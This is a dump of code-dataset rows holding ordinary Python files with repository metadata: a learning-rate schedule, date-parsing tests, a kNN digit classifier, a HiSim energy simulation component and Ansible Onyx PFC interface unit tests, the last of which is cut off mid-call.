License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"learning rate schedule.\"\"\"\nimport math\nfrom .config import cfg_res50\n\n\ndef _linear_warmup_learning_rate(current_step, warmup_steps, base_lr, init_lr):\n lr_inc = (float(base_lr) - float(init_lr)) / float(warmup_steps)\n learning_rate = float(init_lr) + lr_inc * current_step\n return learning_rate\n\n\ndef _a_cosine_learning_rate(current_step, base_lr, warmup_steps, 
decay_steps):\n base = float(current_step - warmup_steps) / float(decay_steps)\n learning_rate = (1 + math.cos(base * math.pi)) / 2 * base_lr\n return learning_rate\n\n\ndef _dynamic_lr(base_lr, total_steps, warmup_steps, warmup_ratio=1 / 3):\n lr = []\n for i in range(total_steps):\n if i < warmup_steps:\n lr.append(_linear_warmup_learning_rate(i, warmup_steps, base_lr, base_lr * warmup_ratio))\n else:\n lr.append(_a_cosine_learning_rate(i, base_lr, warmup_steps, total_steps))\n\n return lr\n\n\ndef adjust_learning_rate(initial_lr, gamma, stepvalues, steps_pre_epoch, total_epochs, warmup_epoch=5):\n if cfg_res50['lr_type'] == 'dynamic_lr':\n return _dynamic_lr(initial_lr, total_epochs * steps_pre_epoch, warmup_epoch * steps_pre_epoch,\n warmup_ratio=1 / 3)\n\n lr_each_step = []\n for epoch in range(1, total_epochs + 1):\n for _ in range(steps_pre_epoch):\n if epoch <= warmup_epoch:\n lr = 0.1 * initial_lr * (1.5849 ** (epoch - 1))\n else:\n if stepvalues[0] <= epoch <= stepvalues[1]:\n lr = initial_lr * (gamma ** (1))\n elif epoch > stepvalues[1]:\n lr = initial_lr * (gamma ** (2))\n else:\n lr = initial_lr\n lr_each_step.append(lr)\n return lr_each_step\n"},"avg_line_length":{"kind":"number","value":39.2903225806,"string":"39.290323"},"max_line_length":{"kind":"number","value":103,"string":"103"},"alphanum_fraction":{"kind":"number","value":0.644909688,"string":"0.64491"}}},{"rowIdx":46355,"cells":{"hexsha":{"kind":"string","value":"fc36197e9b5f7a39f94875fa5f46ff8640aed7c6"},"size":{"kind":"number","value":5903,"string":"5,903"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py"},"max_stars_repo_name":{"kind":"string","value":"diCagri/content"},"max_stars_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_stars_repo_licenses":{"kind":"list 
like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":799,"string":"799"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2016-08-02T06:43:14.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-31T11:10:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py"},"max_issues_repo_name":{"kind":"string","value":"diCagri/content"},"max_issues_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":9317,"string":"9,317"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2016-08-07T19:00:51.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-31T21:56:04.000Z"},"max_forks_repo_path":{"kind":"string","value":"Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py"},"max_forks_repo_name":{"kind":"string","value":"diCagri/content"},"max_forks_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1297,"string":"1,297"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2016-08-04T13:59:00.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-31T23:43:06.000Z"},"content":{"kind":"string","value":"from DateStringToISOFormat import parse_datestring_to_iso\nimport demistomock as demisto\nimport pytest\n\n\n# date_value, day_first, year_first, fuzzy, expected_output\ntestdata = [\n ('05-11-2929', True, True, True, True, '2929-11-05T00:00:00+00:00'),\n ('05-11-2929', True, False, True, True, '2929-11-05T00:00:00+00:00'),\n ('05-11-2929', True, True, False, True, 
'2929-11-05T00:00:00+00:00'),\n ('05-11-2929', True, False, False, False, '2929-11-05T00:00:00'),\n ('05-11-2929', False, True, True, False, '2929-05-11T00:00:00'),\n ('05-11-2929', False, False, True, False, '2929-05-11T00:00:00'),\n ('05-11-2929', False, False, False, False, '2929-05-11T00:00:00'),\n ('2020-06-11T17:34:35.754203+03:00', True, True, True, True, '2020-11-06T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', True, False, True, True, '2020-11-06T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', True, True, False, True, '2020-11-06T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', True, False, False, True, '2020-11-06T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', False, True, True, False, '2020-06-11T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', False, False, True, False, '2020-06-11T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', False, False, False, False, '2020-06-11T17:34:35.754203+03:00'),\n (\"June 21st 2020 Eastern Standard Time\", True, True, True, True, \"2020-06-21T00:00:00+00:00\"),\n (\"June 21st 2020 Eastern Standard Time\", True, False, True, True, \"2020-06-21T00:00:00+00:00\"),\n (\"June 21st 2020 Eastern Standard Time\", True, True, False, True, \"June 21st 2020 Eastern Standard Time\"),\n (\"June 21st 2020 Eastern Standard Time\", True, False, False, True, \"June 21st 2020 Eastern Standard Time\"),\n (\"June 21st 2020 Eastern Standard Time\", False, True, True, False, \"2020-06-21T00:00:00\"),\n (\"June 21st 2020 Eastern Standard Time\", False, False, True, False, \"2020-06-21T00:00:00\"),\n (\"June 21st 2020 Eastern Standard Time\", False, False, False, False, \"June 21st 2020 Eastern Standard Time\"),\n (\"The 1st of June 2020\", True, True, True, True, \"2020-06-01T00:00:00+00:00\"),\n (\"The 1st of June 2020\", True, False, True, True, \"2020-06-01T00:00:00+00:00\"),\n (\"The 1st of June 2020\", True, True, False, True, \"The 1st of June 
2020\"),\n (\"The 1st of June 2020\", True, False, False, True, \"The 1st of June 2020\"),\n (\"The 1st of June 2020\", False, True, True, False, \"2020-06-01T00:00:00\"),\n (\"The 1st of June 2020\", False, False, True, False, \"2020-06-01T00:00:00\"),\n (\"The 1st of June 2020\", False, False, False, False, \"The 1st of June 2020\"),\n ('2020-06-11T17:34:35.754Z', False, False, False, True, '2020-06-11T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', True, True, True, True, '2020-11-06T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', True, False, True, True, '2020-11-06T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', True, True, False, True, '2020-11-06T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', True, False, False, True, '2020-11-06T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', False, True, True, False, '2020-06-11T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', False, False, True, False, '2020-06-11T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', False, False, False, False, '2020-06-11T17:34:35.754000+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', False, False, False, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', True, True, True, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', True, False, True, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', True, True, False, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', True, False, False, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', False, True, True, False, '2020-11-20T11:41:42'),\n ('Fri, 20 Nov 2020 11:41:42', False, False, True, False, '2020-11-20T11:41:42'),\n ('Fri, 20 Nov 2020 11:41:42', False, False, False, False, '2020-11-20T11:41:42'),\n ('Fri, 20 Nov 2020 11:41:42', False, False, False, False, '2020-11-20T11:41:42'),\n]\n\n\n@pytest.mark.parametrize('date_value,day_first,year_first,fuzzy,add_utc_timezone,expected_output', testdata)\ndef 
test_parse_datestring_to_iso(mocker, date_value, day_first, year_first, fuzzy, add_utc_timezone, expected_output):\n '''Scenario: Parse an arbitrary date string and convert it to ISO 8601 format\n\n Given\n - An arbitrary date string\n When\n - The date string can be an ambiguous 3-integer date, fuzzy date string or an\n already iso-8601 formatted date string\n Then\n - Ensure the output date string is in iso-8601 format in all cases\n\n Args:\n date_value (str): A string containing a date stamp.\n day_first (bool): Whether to interpret the first value in an ambiguous 3-integer date\n (e.g. 01/05/09) as the day or month.\n year_first (bool): Whether to interpret the first value in an ambiguous 3-integer date\n (e.g. 01/05/09) as the year. If ``True``, the first number is taken to\n be the year, otherwise the last number is taken to be the year.\n fuzzy (bool): Whether to allow fuzzy parsing, allowing for string like \"Today is\n January 1, 2047 at 8:21:00AM\".\n add_utc_timezone (bool): Whether to add UTC timezone to the date string returned in case offset-naive\n date was provided as input.\n expected_output (str): The iso 8601 formatted date to check the result against\n '''\n mocker.patch.object(demisto, 'error')\n assert parse_datestring_to_iso(date_value, day_first, year_first, fuzzy, add_utc_timezone) == 
expected_output\n"},"avg_line_length":{"kind":"number","value":71.1204819277,"string":"71.120482"},"max_line_length":{"kind":"number","value":118,"string":"118"},"alphanum_fraction":{"kind":"number","value":0.6554294427,"string":"0.655429"}}},{"rowIdx":46356,"cells":{"hexsha":{"kind":"string","value":"5dca870e069c6a0a5d577bc3920a45fd2a1a7e19"},"size":{"kind":"number","value":5289,"string":"5,289"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"KNN/kNN.py"},"max_stars_repo_name":{"kind":"string","value":"lance52587/MachineLearningNote"},"max_stars_repo_head_hexsha":{"kind":"string","value":"0184f8de178990ee31ace2a43809830874313697"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":37,"string":"37"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-06-06T05:58:54.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-02-21T04:49:54.000Z"},"max_issues_repo_path":{"kind":"string","value":"KNN/kNN.py"},"max_issues_repo_name":{"kind":"string","value":"YYangjlu/MachineLearningNote"},"max_issues_repo_head_hexsha":{"kind":"string","value":"d34a9b57af3b2c6f276d14c2a7a3dccadb585421"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"KNN/kNN.py"},"max_forks_repo_name":{"kind":"string","value":"YYangjlu/MachineLearningNote"},"max_forks_repo_head_hexsha":{"kind":"string","value":"d34a9b57af3b2c6f276d14c2a7a3dccadb585421"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_forks_count":{"kind":"number","value":35,"string":"35"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2018-10-01T16:12:34.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-02-21T03:35:33.000Z"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# @Date : 2017-04-03 15:47:04\n# @Author : Alan Lau (rlalan@outlook.com)\n# import numpy as np\n# import distance\n# import fwalker\n# import reader\n# import statistic\n\n# def get_data(data_path):\n# label_vec = []\n# files = fwalker.fun(data_path)\n# for file in files:\n# ech_label_vec = []\n# ech_label = int((file.split('\\\\'))[-1][0])\n# ech_vec = ((np.loadtxt(file)).ravel())\n# ech_label_vec.append(ech_label)\n# ech_label_vec.append(ech_vec)\n# label_vec.append(ech_label_vec)\n# return label_vec\n\n# def find_label(train_vec_list, vec, k):\n# get_label_list = []\n# for ech_trainlabel_vec in train_vec_list:\n# ech_label_distance = []\n# train_label, train_vec = ech_trainlabel_vec[0], ech_trainlabel_vec[1]\n# vec_distance = distance.Euclidean(train_vec, vec)\n# ech_label_distance.append(train_label)\n# ech_label_distance.append(vec_distance)\n# get_label_list.append(ech_label_distance)\n# result_k = np.array(get_label_list)\n# order_distance = (result_k.T)[1].argsort()\n# order = np.array((result_k[order_distance].T)[0])\n# top_k = np.array(order[:k], dtype=int)\n# find_label = statistic.orderdic(statistic.statistic(top_k), True)[0][0]\n# return find_label\n\n# def classify(train_vec_list, test_vec_list, k):\n# error_counter = 0\n# for ech_label_vec in test_vec_list:\n# label, vec = ech_label_vec[0], ech_label_vec[1]\n# get_label = find_label(train_vec_list, vec, k)\n# print('Original label is:'+str(label) +\n# ', kNN label is:'+str(get_label))\n# if str(label) != str(get_label):\n# error_counter += 1\n# else:\n# continue\n# true_probability = str(\n# round((1-error_counter/len(test_vec_list))*100, 2))+'%'\n# print('Correct 
probability:'+true_probability)\n\n# def main():\n# k = 3\n# train_data_path = r'D:\\DevelopmentLanguage\\Python\\MachineLearning\\Learning\\KNN\\lab3_0930\\input_digits\\trainingDigits'\n# test_data_path = r'D:\\DevelopmentLanguage\\Python\\MachineLearning\\Learning\\KNN\\lab3_0930\\input_digits\\testDigits'\n# train_vec_list = get_data(train_data_path)\n# test_vec_list = get_data(test_data_path)\n# classify(train_vec_list, test_vec_list, k)\n\n# if __name__ == '__main__':\n# main()\n\n# -*- coding: utf-8 -*-\n# @Date : 2017-04-03 15:47:04\n# @Author : Alan Lau (rlalan@outlook.com)\n\nimport os\nimport math\nimport collections\nimport numpy as np\n\n\ndef Euclidean(vec1, vec2):\n npvec1, npvec2 = np.array(vec1), np.array(vec2)\n return math.sqrt(((npvec1 - npvec2)**2).sum())\n\n\ndef fwalker(path):\n fileArray = []\n for root, dirs, files in os.walk(path):\n for fn in files:\n eachpath = str(root + '\\\\' + fn)\n fileArray.append(eachpath)\n return fileArray\n\n\ndef orderdic(dic, reverse):\n ordered_list = sorted(\n dic.items(), key=lambda item: item[1], reverse=reverse)\n return ordered_list\n\n\ndef get_data(data_path):\n label_vec = []\n files = fwalker(data_path)\n for file in files:\n ech_label_vec = []\n ech_label = int((file.split('\\\\'))[-1][0]) # 获取每个向量的标签\n ech_vec = ((np.loadtxt(file)).ravel()) # 获取每个文件的向量\n ech_label_vec.append(ech_label) # 将一个文件夹的标签和向量放到同一个list内\n ech_label_vec.append(\n ech_vec\n ) # 将一个文件夹的标签和向量放到同一个list内,目的是将标签和向量对应起来,类似于字典,这里不直接用字典因为字典的键(key)不可重复。\n label_vec.append(ech_label_vec) # 再将所有的标签和向量存入一个list内,构成二维数组\n return label_vec\n\n\ndef find_label(train_vec_list, vec, k):\n get_label_list = []\n for ech_trainlabel_vec in train_vec_list:\n ech_label_distance = []\n train_label, train_vec = ech_trainlabel_vec[0], ech_trainlabel_vec[1]\n vec_distance = Euclidean(train_vec, vec) # 计算距离\n ech_label_distance.append(train_label)\n ech_label_distance.append(vec_distance) # 将距离和标签对应存入list\n get_label_list.append(ech_label_distance)\n 
result_k = np.array(get_label_list)\n order_distance = (result_k.T)[1].argsort() # 对距离进行排序\n order = np.array((result_k[order_distance].T)[0])\n top_k = np.array(order[:k], dtype=int) # 获取前k距离和标签\n find_label = orderdic(collections.Counter(top_k),\n True)[0][0] # 统计在前k排名中标签出现频次\n return find_label\n\n\ndef classify(train_vec_list, test_vec_list, k):\n error_counter = 0 #计数器,计算错误率\n for ech_label_vec in test_vec_list:\n label, vec = ech_label_vec[0], ech_label_vec[1]\n get_label = find_label(train_vec_list, vec, k) # 获得学习得到的标签\n print('Original label is:' + str(label) + ', kNN label is:' +\n str(get_label))\n if str(label) != str(get_label):\n error_counter += 1\n else:\n continue\n true_probability = str(\n round((1 - error_counter / len(test_vec_list)) * 100, 2)) + '%'\n print('Correct probability:' + true_probability)\n\n\ndef main():\n k = 3\n train_data_path = r'..\\KNN\\lab3_0930\\input_digits\\trainingDigits'\n test_data_path = r'..\\KNN\\lab3_0930\\input_digits\\testDigits'\n train_vec_list = get_data(train_data_path)\n test_vec_list = get_data(test_data_path)\n classify(train_vec_list, test_vec_list, k)\n\n\nif __name__ == '__main__':\n main()"},"avg_line_length":{"kind":"number","value":34.568627451,"string":"34.568627"},"max_line_length":{"kind":"number","value":123,"string":"123"},"alphanum_fraction":{"kind":"number","value":0.650973719,"string":"0.650974"}}},{"rowIdx":46357,"cells":{"hexsha":{"kind":"string","value":"5d30b9642ca02eb7664d764f1fd524886afbe78d"},"size":{"kind":"number","value":6643,"string":"6,643"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"hisim/components/dummy.py"},"max_stars_repo_name":{"kind":"string","value":"sdickler/HiSim"},"max_stars_repo_head_hexsha":{"kind":"string","value":"09a11d99f220f7cadb3cb7b09a6fce8f147243c8"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"hisim/components/dummy.py"},"max_issues_repo_name":{"kind":"string","value":"sdickler/HiSim"},"max_issues_repo_head_hexsha":{"kind":"string","value":"09a11d99f220f7cadb3cb7b09a6fce8f147243c8"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"hisim/components/dummy.py"},"max_forks_repo_name":{"kind":"string","value":"sdickler/HiSim"},"max_forks_repo_head_hexsha":{"kind":"string","value":"09a11d99f220f7cadb3cb7b09a6fce8f147243c8"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2022-03-13T16:15:36.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-13T16:15:36.000Z"},"content":{"kind":"string","value":"# Generic/Built-in\nimport copy\nimport numpy as np\nfrom typing import List, Optional\n# Owned\nfrom hisim.component import Component, SingleTimeStepValues, ComponentInput, ComponentOutput\nfrom hisim.components.ev_charger import SimpleStorageState\nfrom hisim.utils import HISIMPATH\nfrom hisim import loadtypes as lt\nfrom hisim.utils import load_smart_appliance\nfrom hisim import utils\nimport pdb\nfrom hisim.simulationparameters import SimulationParameters\n\n\n__authors__ = \"Vitor Hugo Bellotto Zago\"\n__copyright__ = \"Copyright 2021, the House Infrastructure Project\"\n__credits__ = [\"Noah Pflugradt\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Vitor Hugo Bellotto Zago\"\n__email__ = 
\"vitor.zago@rwth-aachen.de\"\n__status__ = \"development\"\n\nclass Dummy(Component):\n \"\"\"\n Component component the supports multiple\n dummy values for fictitious scenarios. The\n values passed to the constructor are taken\n as constants to build the load profile for\n the entire simulation duration\n\n Parameters\n ----------\n electricity : float\n Constant to define electricity output profile\n heat : float\n Constant to define heat output profile\n capacity : float\n Stored energy when starting the simulation\n initial_temperature : float\n Initial temperature when starting the simulation\n sim_params: cp.SimulationParameters\n Simulation parameters used by the setup function:\n \"\"\"\n ThermalEnergyDelivered = \"ThermalEnergyDelivered\"\n\n # Outputs\n ElectricityOutput = \"ElectricityOutput\"\n TemperatureMean = \"Residence Temperature\"\n StoredEnergy=\"StoredEnergy\"\n\n def __init__(self,\n my_simulation_parameters: SimulationParameters,\n electricity=None,\n heat=None,\n capacity=None,\n initial_temperature=None,\n ):\n super().__init__(name=\"Dummy\", my_simulation_parameters=my_simulation_parameters)\n self.capacity:float\n self.initial_temperature:float\n self.build(electricity=electricity,\n heat=heat,\n capacity=capacity,\n initial_temperature=initial_temperature)\n\n self.thermal_energy_deliveredC : ComponentInput = self.add_input(self.ComponentName,\n self.ThermalEnergyDelivered,\n lt.LoadTypes.Heating,\n lt.Units.Watt,\n False)\n\n self.t_mC : ComponentOutput = self.add_output(self.ComponentName,\n self.TemperatureMean,\n lt.LoadTypes.Temperature,\n lt.Units.Celsius)\n\n self.electricity_outputC: ComponentOutput = self.add_output(self.ComponentName,\n self.ElectricityOutput,\n lt.LoadTypes.Electricity,\n lt.Units.Watt)\n self.stored_energyC: ComponentOutput = self.add_output(self.ComponentName,\n self.StoredEnergy,\n lt.LoadTypes.Heating,\n lt.Units.Watt)\n self.temperature:float = -300\n\n\n def build(self, electricity:Optional[float], 
heat:float, capacity:Optional[float], initial_temperature:Optional[float]):\n self.time_correction_factor:float = 1 / self.my_simulation_parameters.seconds_per_timestep\n self.seconds_per_timestep:float = self.my_simulation_parameters.seconds_per_timestep\n\n if electricity is None:\n self.electricity_output:float = - 1E3\n else:\n self.electricity_output = - 1E3 * electricity\n\n\n if capacity is None:\n self.capacity = 45 * 121.2\n else:\n self.capacity = capacity\n\n if initial_temperature is None:\n self.temperature = 25\n self.initial_temperature = 25\n else:\n self.temperature = initial_temperature\n self.initial_temperature = initial_temperature\n self.previous_temperature = self.temperature\n\n\n def write_to_report(self):\n lines:List =[]\n return lines\n\n def i_save_state(self):\n self.previous_temperature = self.temperature\n\n def i_restore_state(self):\n self.temperature = self.previous_temperature\n\n\n def i_doublecheck(self, timestep: int, stsv: SingleTimeStepValues):\n pass\n\n def i_simulate(self, timestep: int, stsv: SingleTimeStepValues, force_convergence: bool):\n electricity_output:float = 0\n if timestep >= 60*6 and timestep < 60*9:\n electricity_output = self.electricity_output\n elif timestep >= 60*15 and timestep < 60*18:\n electricity_output = - self.electricity_output\n\n stsv.set_output_value(self.electricity_outputC, electricity_output)\n\n if timestep <= 60*12:\n thermal_delivered_energy = 0\n temperature:float = self.initial_temperature\n current_stored_energy = ( self.initial_temperature + 273.15) * self.capacity\n else:\n thermal_delivered_energy = stsv.get_input_value(self.thermal_energy_deliveredC)\n previous_stored_energy = (self.previous_temperature + 273.15) * self.capacity\n current_stored_energy = previous_stored_energy + thermal_delivered_energy\n self.temperature = current_stored_energy / self.capacity - 273.15\n temperature = self.temperature\n\n #thermal_delivered_energy = 0\n #temperature = self.initial_temperature\n 
#current_stored_energy = ( self.initial_temperature + 273.15) * self.capacity\n # else:\n #thermal_delivered_energy = stsv.get_input_value(self.thermal_energy_deliveredC)\n #previous_stored_energy = (self.previous_temperature + 273.15) * self.capacity\n #current_stored_energy = previous_stored_energy + thermal_delivered_energy\n #self.temperature = current_stored_energy / self.capacity - 273.15\n #temperature = self.temperature\n\n stsv.set_output_value(self.stored_energyC, current_stored_energy)\n stsv.set_output_value(self.t_mC, temperature)\n\n\n"},"avg_line_length":{"kind":"number","value":41.0061728395,"string":"41.006173"},"max_line_length":{"kind":"number","value":124,"string":"124"},"alphanum_fraction":{"kind":"number","value":0.6171910281,"string":"0.617191"}}},{"rowIdx":46358,"cells":{"hexsha":{"kind":"string","value":"dbaaf23f145d5a04f8b02a26023396b77b3dc4df"},"size":{"kind":"number","value":4447,"string":"4,447"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py"},"max_stars_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py"},"max_issues_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py"},"max_forks_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#\n# Copyright: Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\n# Make coding more python3-ish\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nfrom ansible_collections.community.general.tests.unit.compat.mock import patch\nfrom ansible_collections.community.general.plugins.modules.network.onyx import onyx_pfc_interface\nfrom ansible_collections.community.general.tests.unit.modules.utils import set_module_args\nfrom ..onyx_module import 
TestOnyxModule, load_fixture\n\n\nclass TestOnyxPfcInterfaceModule(TestOnyxModule):\n\n module = onyx_pfc_interface\n\n def setUp(self):\n super(TestOnyxPfcInterfaceModule, self).setUp()\n self._pfc_enabled = True\n self.mock_get_config = patch.object(\n onyx_pfc_interface.OnyxPfcInterfaceModule,\n \"_get_pfc_config\")\n self.get_config = self.mock_get_config.start()\n\n self.mock_load_config = patch(\n 'ansible_collections.community.general.plugins.module_utils.network.onyx.onyx.load_config')\n self.load_config = self.mock_load_config.start()\n self.mock_get_version = patch.object(\n onyx_pfc_interface.OnyxPfcInterfaceModule, \"_get_os_version\")\n self.get_version = self.mock_get_version.start()\n\n def tearDown(self):\n super(TestOnyxPfcInterfaceModule, self).tearDown()\n self.mock_get_config.stop()\n self.mock_load_config.stop()\n self.mock_get_version.stop()\n\n def load_fixtures(self, commands=None, transport='cli'):\n if self._pfc_enabled:\n suffix = 'enabled'\n else:\n suffix = 'disabled'\n config_file = 'onyx_pfc_interface_%s.cfg' % suffix\n\n self.get_config.return_value = load_fixture(config_file)\n self.load_config.return_value = None\n self.get_version.return_value = \"3.6.5000\"\n\n def _test_pfc_if(self, if_name, enabled, changed, commands):\n state = 'enabled' if enabled else 'disabled'\n set_module_args(dict(name=if_name, state=state))\n self.execute_module(changed=changed, commands=commands)\n\n def _test_pfc_no_change(self, enabled):\n interfaces = ('Eth1/1', 'Eth1/1/2', 'Po1', 'Mpo2')\n changed = False\n commands = None\n for ifc in interfaces:\n self._test_pfc_if(ifc, enabled, changed, commands)\n\n def test_pfc_enabled_no_change(self):\n self._pfc_enabled = True\n enabled = True\n self._test_pfc_no_change(enabled)\n\n def test_pfc_disabled_no_change(self):\n self._pfc_enabled = False\n enabled = False\n self._test_pfc_no_change(enabled)\n\n def _test_pfc_change(self, enabled):\n cmd_list = [\n ('Eth1/1', 'interface ethernet 1/1'),\n 
('Eth1/1/2', 'interface ethernet 1/1/2'),\n ('Po1', 'interface port-channel 1'),\n ('Mpo2', 'interface mlag-port-channel 2'),\n ]\n changed = True\n suffix = ' dcb priority-flow-control mode on force'\n if not enabled:\n suffix = ' no dcb priority-flow-control mode force'\n for (if_name, cmd) in cmd_list:\n commands = [cmd + suffix]\n self._test_pfc_if(if_name, enabled, changed, commands)\n\n def test_pfc_disabled_change(self):\n self._pfc_enabled = False\n enabled = True\n self._test_pfc_change(enabled)\n\n def test_pfc_enabled_change(self):\n self._pfc_enabled = True\n enabled = False\n self._test_pfc_change(enabled)\n\n def test_pfc_aggregate(self):\n self._pfc_enabled = False\n aggregate = [dict(name='Eth1/1'), dict(name='Eth1/1/2')]\n set_module_args(dict(aggregate=aggregate, state='enabled'))\n commands = [\n 'interface ethernet 1/1 dcb priority-flow-control mode on force',\n 'interface ethernet 1/1/2 dcb priority-flow-control mode on force']\n self.execute_module(changed=True, commands=commands)\n\n def test_pfc_aggregate_purge(self):\n self._pfc_enabled = True\n aggregate = [dict(name='Po1'), dict(name='Mpo2')]\n set_module_args(dict(aggregate=aggregate, state='enabled', purge=True))\n commands = [\n 'interface ethernet 1/1 no dcb priority-flow-control mode force',\n 'interface ethernet 1/1/2 no dcb priority-flow-control mode force']\n self.execute_module(changed=True, 
